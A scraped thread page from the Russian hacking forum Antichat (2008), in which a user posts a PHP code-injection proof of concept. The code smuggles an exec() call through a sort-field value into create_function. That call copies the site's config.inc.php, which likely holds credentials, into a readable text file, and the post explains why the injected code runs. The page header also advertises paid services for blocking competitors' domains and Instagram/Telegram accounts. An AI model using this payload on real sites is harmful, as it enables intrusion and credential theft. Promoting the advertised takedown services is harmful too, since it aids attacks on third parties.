Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Опции темы

Поиск в этой теме

Опции просмотра

#11

28.09.2008, 14:44

halkfild

Постоянный

Регистрация: 11.11.2005

Сообщений: 391

С нами: 10787366

Репутация: 2277

PHP код:


		
			
<?

$sort_by='"]) || exec(\'cp $(pwd)"/config.inc.php" config.txt\'); //';

$sort_order='desc';



$sort_function = '

            return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);

        ';

echo $sort_function;



create_function('$a, $b', $sort_function)

?>

мы просто тактично делаем пхп инжект

вот что мы получим в $sort_function

Цитата:

return -1 * ($a[""]) || exec('cp $(pwd)"/config.inc.php" config.txt'); //"], $b[""]) || exec('cp $(pwd)"/config.inc.php" config.txt'); //"]);

я изменил or на ||
это просто логическое условие, что заставляет выполнятся наш код...

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 14 (пользователей: 0 , гостей: 14)

Быстрый переход

Home

Help

Terms and Rules